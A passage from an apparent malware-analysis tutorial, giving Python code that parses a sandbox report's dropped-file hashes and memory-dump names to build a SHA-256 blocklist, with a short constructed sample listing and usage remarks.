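# (or not a regular file, e.g. a named pipe) when the sandbox hashed it.
EMPTY_DIGESTS = {
    "md5": hashlib.md5(b"").hexdigest(),
    "sha1": hashlib.sha1(b"").hexdigest(),
    "sha256": hashlib.sha256(b"").hexdigest(),
    "sha512": hashlib.sha512(b"").hexdigest(),
}
DIGEST_LEN = {"md5": 32, "sha1": 40, "sha256": 64, "sha512": 128}

# "| SHA256 | <hex> |" rows under a path, and the sandbox's dump file names.
HASH_ROW = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9A-Fa-f]+)\s*\|$")
MEM_LINE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")


@dataclass
class DroppedFile:
    path: str
    hashes: dict[str, str] = field(default_factory=dict)
    problems: list[str] = field(default_factory=list)


@dataclass
class MemoryDump:
    pid: int
    seq: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_listing(text: str) -> tuple[list[DroppedFile], list[MemoryDump]]:
    """Walk the listing line by line; a hash row belongs to the most recent path line."""
    files: list[DroppedFile] = []
    dumps: list[MemoryDump] = []
    current: DroppedFile | None = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_ROW.match(line)
        if m:
            if current is None:  # orphan row whose path line was cut off: skip it
                continue
            algo, value = m.group(1).lower(), m.group(2).lower()
            if len(value) != DIGEST_LEN[algo]:
                current.problems.append(f"{algo} has {len(value)} hex digits, expected {DIGEST_LEN[algo]}")
            elif value == EMPTY_DIGESTS[algo]:
                current.problems.append(f"{algo} is the empty-input digest")
            current.hashes[algo] = value
            continue
        m = MEM_LINE.match(line)
        if m:
            dumps.append(MemoryDump(int(m.group(1)), int(m.group(2)),
                                    int(m.group(3), 16), int(m.group(4), 16)))
            continue
        current = DroppedFile(path=line)  # anything else is a path or object name
        files.append(current)
    return files, dumps


def blockable_sha256(files: list[DroppedFile]) -> dict[str, str]:
    """SHA-256 values safe to push to a blocklist: well-formed and not the empty digest."""
    return {
        f.path: f.hashes["sha256"]
        for f in files
        if "sha256" in f.hashes
        and len(f.hashes["sha256"]) == DIGEST_LEN["sha256"]
        and f.hashes["sha256"] != EMPTY_DIGESTS["sha256"]
    }


def largest_region_per_pid(dumps: list[MemoryDump]) -> dict[int, MemoryDump]:
    """Biggest dumped region of each process: the first candidate for an unpacked payload."""
    best: dict[int, MemoryDump] = {}
    for d in dumps:
        if d.pid not in best or d.size > best[d.pid].size:
            best[d.pid] = d
    return best


# Constructed sample: an excerpt of the report's listing (munqk.exe SHA512 row omitted).
SAMPLE = r"""C:\Users\Admin\AppData\Local\Temp\a\munqk.exe
| MD5 | dc7b784b8e4f9db78f88cb20dfbda030 |
| SHA1 | 6045e1d486dd095e43bf4f922500b15e05194719 |
| SHA256 | 92b62c8fbfb7f3002fbf04c225452381e4323834d6de26ec9b17d9691ef900dc |
memory/3248-4961-0x0000000002810000-0x0000000002846000-memory.dmp
memory/3148-5004-0x0000000000400000-0x0000000000412000-memory.dmp
\??\pipe\LOCAL\crashpad_1648_OHBPTTCBIUVHGZCH
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
"""

if __name__ == "__main__":
    files, dumps = parse_listing(SAMPLE)
    for f in files:
        print(f.path, f.problems or "ok")
    print(blockable_sha256(files))
    for pid, d in largest_region_per_pid(dumps).items():
        print(f"pid {pid}: 0x{d.start:x}-0x{d.end:x} ({d.size} bytes)")
```

The parser treats any line that is neither a hash row nor a dump name as a new path, so feed it the Files section only. Entries whose name has been mangled by the page extraction (the `[email protected]` paths above) parse fine but should be dropped from an IOC list by hand, since the real file name is not recoverable from the page.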